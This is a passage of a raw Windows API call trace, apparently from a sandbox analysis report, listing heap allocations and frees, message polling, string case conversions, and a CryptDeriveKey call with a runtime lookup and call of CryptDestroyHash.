lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.720] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0165.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.720] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0165.720] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0165.720] CryptDeriveKey (in: hProv=0xab2890, Algid=0x6601, hBaseData=0xaa55e0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa56a0) returned 1 [0165.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.722] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.723] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.723] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.724] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2db8 | out: hHeap=0x25c0000) returned 1 [0165.724] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.725] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.725] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0165.725] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.725] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.726] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.726] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.726] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0165.726] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.726] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.727] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.728] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466dd0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.728] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.728] CryptDestroyHash (hHash=0xaa55e0) returned 1 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0165.728] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.729] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.729] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.730] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 